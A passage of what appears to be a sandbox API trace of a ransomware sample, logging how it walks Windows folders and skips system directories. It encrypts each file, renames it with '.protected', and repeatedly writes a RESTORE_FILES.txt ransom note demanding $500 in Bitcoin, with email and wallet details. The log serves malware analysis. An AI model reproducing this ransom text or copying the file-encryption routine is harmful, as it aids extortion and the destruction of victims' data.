pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi.protected") returned 157 [0076.666] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi" (normalized: "c:\\programdata\\package cache\\{e512788e-c50b-3858-a4b9-73ad5f3f9e93}v14.10.25017\\packages\\vcruntimeadditional_amd64\\vc_runtimeadditional_x64.msi"), lpNewFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi.protected" (normalized: "c:\\programdata\\package cache\\{e512788e-c50b-3858-a4b9-73ad5f3f9e93}v14.10.25017\\packages\\vcruntimeadditional_amd64\\vc_runtimeadditional_x64.msi.protected")) returned 1 [0076.667] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0 [0076.667] FindClose (in: hFindFile=0x447c80 | out: hFindFile=0x447c80) returned 1 [0076.667] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\RESTORE_FILES.txt") returned 136 [0076.667] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\package cache\\{e512788e-c50b-3858-a4b9-73ad5f3f9e93}v14.10.25017\\packages\\vcruntimeadditional_amd64\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0076.677] lstrlenA (lpString="! 
SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0076.677] WriteFile (in: hFile=0xd4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ec94*=0x53d, lpOverlapped=0x0) returned 1 [0076.678] lstrlenA (lpString="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") returned 684 [0076.678] WriteFile (in: hFile=0xd4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ec94*=0x2ac, lpOverlapped=0x0) returned 1 [0076.678] 
lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0076.678] WriteFile (in: hFile=0xd4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ec94*=0xb1, lpOverlapped=0x0) returned 1 [0076.678] CloseHandle (hObject=0xd4) returned 1 [0076.679] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0076.679] FindClose (in: hFindFile=0x47b7a8 | out: hFindFile=0x47b7a8) returned 1 [0076.679] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\RESTORE_FILES.txt") returned 110 [0076.679] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\package cache\\{e512788e-c50b-3858-a4b9-73ad5f3f9e93}v14.10.25017\\packages\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0076.679] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0076.680] WriteFile (in: hFile=0xb4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ef04*=0x53d, lpOverlapped=0x0) returned 1 [0076.680] lstrlenA (lpString="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") returned 684 [0076.680] WriteFile (in: hFile=0xb4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ef04*=0x2ac, lpOverlapped=0x0) returned 1 [0076.680] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0076.680] WriteFile (in: hFile=0xb4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ef04*=0xb1, 
lpOverlapped=0x0) returned 1 [0076.681] CloseHandle (hObject=0xb4) returned 1 [0076.681] FindNextFileW (in: hFindFile=0x490a28, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0 [0076.681] FindClose (in: hFindFile=0x490a28 | out: hFindFile=0x490a28) returned 1 [0076.681] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\RESTORE_FILES.txt") returned 101 [0076.682] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\package cache\\{e512788e-c50b-3858-a4b9-73ad5f3f9e93}v14.10.25017\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0076.682] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0076.682] WriteFile (in: hFile=0xa4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f174*=0x53d, lpOverlapped=0x0) returned 1 [0076.683] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0076.683] WriteFile (in: hFile=0xa4, 
lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f174*=0x2ac, lpOverlapped=0x0) returned 1 [0076.683] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0076.683] WriteFile (in: hFile=0xa4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f174*=0xb1, lpOverlapped=0x0) returned 1 [0076.683] CloseHandle (hObject=0xa4) returned 1 [0076.683] FindNextFileW (in: hFindFile=0x494b80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0076.683] lstrcmpiW (lpString1="{e52a6842-b0ac-476e-b48f-378a97a67346}", lpString2="Windows") returned -1 [0076.683] lstrcmpiW (lpString1="{e52a6842-b0ac-476e-b48f-378a97a67346}", lpString2="Program Files") returned -1 [0076.683] lstrcmpiW (lpString1="{e52a6842-b0ac-476e-b48f-378a97a67346}", lpString2="Program Files (x86)") returned -1 [0076.683] lstrcmpiW (lpString1="{e52a6842-b0ac-476e-b48f-378a97a67346}", lpString2="$Recycle.bin") returned 1 [0076.683] lstrcmpiW (lpString1="{e52a6842-b0ac-476e-b48f-378a97a67346}", lpString2="System Volume Information") returned -1 [0076.683] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}") returned 71 [0076.683] lstrcmpW (lpString1="{e52a6842-b0ac-476e-b48f-378a97a67346}", lpString2=".") returned 1 [0076.683] lstrcmpW (lpString1="{e52a6842-b0ac-476e-b48f-378a97a67346}", lpString2="..") returned 1 [0076.683] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\*") returned 73 [0076.683] FindFirstFileW 
(in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0x490a28 [0076.684] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0076.684] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0076.684] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0076.684] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0076.684] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0076.684] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\.") returned 73 [0076.684] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0076.684] FindNextFileW (in: hFindFile=0x490a28, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0076.684] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0076.684] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0076.684] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0076.684] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0076.684] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0076.684] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\..") returned 74 [0076.684] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0076.684] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0076.684] FindNextFileW (in: hFindFile=0x490a28, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0076.684] lstrcmpiW (lpString1="state.rsm", lpString2="Windows") returned -1 [0076.684] lstrcmpiW (lpString1="state.rsm", lpString2="Program Files") returned 1 [0076.684] lstrcmpiW (lpString1="state.rsm", lpString2="Program Files 
(x86)") returned 1 [0076.684] lstrcmpiW (lpString1="state.rsm", lpString2="$Recycle.bin") returned 1 [0076.684] lstrcmpiW (lpString1="state.rsm", lpString2="System Volume Information") returned -1 [0076.684] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\state.rsm") returned 81 [0076.684] StrStrIW (lpFirst="state.rsm", lpSrch=".protected") returned 0x0 [0076.684] lstrcmpW (lpString1="state.rsm", lpString2="RESTORE_FILES.txt") returned 1 [0076.684] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0076.684] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0076.685] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\state.rsm" (normalized: "c:\\programdata\\package cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\state.rsm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0076.685] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\state.rsm") returned 81 [0076.685] StrStrW (lpFirst="state.rsm", lpSrch=".txt") returned 0x0 [0076.685] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\state.rsm") returned 81 [0076.685] StrStrW (lpFirst="state.rsm", lpSrch=".rar") returned 0x0 [0076.685] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\state.rsm") returned 81 [0076.685] StrStrW (lpFirst="state.rsm", lpSrch=".zip") returned 0x0 [0076.685] ReadFile (in: hFile=0xb4, lpBuffer=0x49e450, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | 
out: lpBuffer=0x49e450*, lpNumberOfBytesRead=0x295f174*=0x2fe, lpOverlapped=0x0) returned 1 [0076.707] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xfffffd02, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.708] WriteFile (in: hFile=0xb4, lpBuffer=0x49e450*, nNumberOfBytesToWrite=0x2fe, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x49e450*, lpNumberOfBytesWritten=0x295f174*=0x2fe, lpOverlapped=0x0) returned 1 [0076.708] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.708] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0076.708] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0076.708] CloseHandle (hObject=0xb4) returned 1 [0076.708] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\state.rsm.protected") returned 91 [0076.708] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\state.rsm" (normalized: "c:\\programdata\\package cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\state.rsm"), lpNewFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\state.rsm.protected" (normalized: "c:\\programdata\\package cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\state.rsm.protected")) returned 1 [0076.709] FindNextFileW (in: hFindFile=0x490a28, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0076.709] lstrcmpiW (lpString1="VC_redist.x64.exe", 
lpString2="Windows") returned -1 [0076.709] lstrcmpiW (lpString1="VC_redist.x64.exe", lpString2="Program Files") returned 1 [0076.709] lstrcmpiW (lpString1="VC_redist.x64.exe", lpString2="Program Files (x86)") returned 1 [0076.709] lstrcmpiW (lpString1="VC_redist.x64.exe", lpString2="$Recycle.bin") returned 1 [0076.709] lstrcmpiW (lpString1="VC_redist.x64.exe", lpString2="System Volume Information") returned 1 [0076.709] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\VC_redist.x64.exe") returned 89 [0076.709] StrStrIW (lpFirst="VC_redist.x64.exe", lpSrch=".protected") returned 0x0 [0076.709] lstrcmpW (lpString1="VC_redist.x64.exe", lpString2="RESTORE_FILES.txt") returned 1 [0076.709] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0076.709] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0076.709] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\VC_redist.x64.exe" (normalized: "c:\\programdata\\package cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\vc_redist.x64.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0076.709] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\VC_redist.x64.exe") returned 89 [0076.709] StrStrW (lpFirst="VC_redist.x64.exe", lpSrch=".txt") returned 0x0 [0076.709] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\VC_redist.x64.exe") returned 89 [0076.709] StrStrW (lpFirst="VC_redist.x64.exe", lpSrch=".rar") returned 0x0 [0076.709] lstrlenW 
(lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\VC_redist.x64.exe") returned 89 [0076.709] StrStrW (lpFirst="VC_redist.x64.exe", lpSrch=".zip") returned 0x0 [0076.709] ReadFile (in: hFile=0xb4, lpBuffer=0x49e450, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x49e450*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0076.715] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.716] WriteFile (in: hFile=0xb4, lpBuffer=0x49e450*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x49e450*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0076.716] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.716] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0076.724] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0076.724] CloseHandle (hObject=0xb4) returned 1 [0076.726] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\VC_redist.x64.exe.protected") returned 99 [0076.726] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\VC_redist.x64.exe" (normalized: "c:\\programdata\\package cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\vc_redist.x64.exe"), lpNewFileName="\\\\?\\C:\\ProgramData\\Package 
Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\VC_redist.x64.exe.protected" (normalized: "c:\\programdata\\package cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\vc_redist.x64.exe.protected")) returned 1 [0076.726] FindNextFileW (in: hFindFile=0x490a28, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0 [0076.726] FindClose (in: hFindFile=0x490a28 | out: hFindFile=0x490a28) returned 1 [0076.728] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\RESTORE_FILES.txt") returned 89 [0076.728] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\package cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0076.794] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0076.794] WriteFile (in: hFile=0xa4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f174*=0x53d, lpOverlapped=0x0) returned 1 [0076.795] lstrlenA (lpString="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") returned 684 [0076.795] WriteFile (in: hFile=0xa4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f174*=0x2ac, lpOverlapped=0x0) returned 1 [0076.795] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0076.795] WriteFile (in: hFile=0xa4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f174*=0xb1, 
